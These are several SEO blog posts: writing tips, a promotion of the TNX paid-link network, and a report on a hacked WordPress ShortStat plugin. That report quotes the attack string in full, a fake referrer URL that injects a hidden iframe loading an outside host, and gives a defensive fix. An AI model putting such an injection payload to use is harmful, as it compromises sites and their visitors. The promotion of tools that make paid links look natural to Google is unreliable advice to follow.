SEO Tip #712 - Latent Semantic Indexing

posted by Jace

John from http://www.searchengineworkshops.com/ gives us another excellent tip today, be sure and check out their seo workshops and if you have the chance be sure and attend one!

Latent Semantic Indexing or LSI for short, is an extremely powerful influence to relevancy.

Just remember that it does not ever replace good basic optimization factors, but it is something that you can study and apply to specific pages for those occasions where you have very low KEI (Keyword Effectiveness Index) phrases, that are highly competitive.

LSI is an influence that is at work in the background rewarding you for writing higher quality, (well written) content.

When you hear Matt Cutts from Google talking about writing better quality content, he is not offering deep hidden meaning in his advice. There are EXCELLENT reasons to right higher quality content that reads well to your visitors.

Best advice is to create content that is useful, reads well and that serves some legitimate purpose.

I normally don’t post about stuff like this, but this program was pretty cool so I thought I would share it with you. It is called TNX, and it is an ad system that allows you to sell ads on every page of your website, instead of just the main page, the way I see it, it could possibly be 5-10x more profitable than selling site wide links. You, as a webmaster, can even chose what ads you want to appear, along with what advertisers, and on which pages of your site! You can read about that feature on Digital Point, where I found out about TNX in the first place: click here for the thread

As an advertiser myself, I can see why it would be a great place to buy links, not only is the price point REALLY killer, but I have the ability to promote hundreds of keywords VERY easily. They also offer pretty nice discounts for SEO peeps, plus check out this article they wrote about ranking in google for a competitive keyword :)

One thing I read about today on Digital Point is that TNX is offering a tool for advertisers to make links look natural in the eyes of Google, check out this free tool here.

All in all I am pretty damn happy with what they have offered so far, it surely beats out any other ad networks I have found, wanna give it a try? Then go ahead and click here.

Have you used TNX? Let me know what you think by throwing me some comments :)

Oh yeah, one more thing, they DO have an affiliate program, unlike other text link advertising companies

SEO Tip #301

posted by Jace

Thanks to John at Search Engine Workshops for another great tip

-Create content that serves your customer’s needs FIRST and your
own needs second.

-Create content that will meet your visitor’s exact search query
and satisfy it.

-Create content your visitor will be GLAD that they found - something
of true merit.

-Create content that is based on real “behaviorally based research”
rather than guessing at keywords.

-Create content that is written for your specific visitor so that
it flows smoothly and reads well to them.

-Create content that is original and you feel proud to have created it.

-Create content that has a solid, well written “call to action.”

I haven’t gotten too much info as of yet, but somehow their is a russian hacker messing with shortstat installations, the minute you click on shortstat it redirects you to a page filled with ads to adultfriendfinder and the page is also loaded with viruses.

more info as I get it

UPDATE:

ok, i figured it out

i went into my database and he is sending a fake referrer with this as the url

DO NOT OPEN THIS LINK
http://a”></a>what>we<iframe src=http://peewee.6x.to style=display:none></iframe><won.com
DO NOT OPEN THIS LINK

Just open up phpmyadmin and do a search for “iframe” in the wp_ss_stats table

and I would suggest coding something into the wp-shortstat.php to not allow the term “iframe” to be used in referrers.

SEO Tip #916

posted by Jace

If you are in the midst of creating a new article or content for your Web site, remember that time is your friend. Don’t be in a rush but take your time to release your finished work over at least 48 hours or longer.

Our thoughts creatively continue as the old expression suggests…as we “sleep on it.” This applies especially to creative writing or even just copywriting in general. Try working on two or three different projects at a time and over a period of a few days.

Don’t be in a big rush to finish something off quickly. But give yourself the liberty to be creative over a  period of time. Fashion your articles as you assemble your thoughts onto paper. Writing is something that flows with practice. Great articles are often born as you take the time you need to write them.

My Blog Posting Workflow

posted by Jace

You get an idea for a post - it might start out as just a few words, a title, a point or two - but how do you take the idea and mould it into a full post?

In he above video (see a full sized version of it here) I take you through a series of screenshots of a post that I wrote a few days ago on how to be a ruthless blogger and tell you about my posting workflow.

The workflow that I describe isn’t the same for every post that I write (some are obviously a lot less involved - but it does describe the way that I work on most of my feature length posts that you see here on ProBlogger.

I’d love to hear about your own blog posting workflow in comments below.

I need to regroup…what about you?

posted by Jace

I have so much stuff going on, so many hosting accounts, so many domains, etc….It is driving me nuts, I really need to gather it all on paper and figure out where I am going. I have spent so many days just building, and I would imagine if I sat down and organized it all I would probably make a lot more money from it all.

Tell me about your issues with being organized (or not at all)
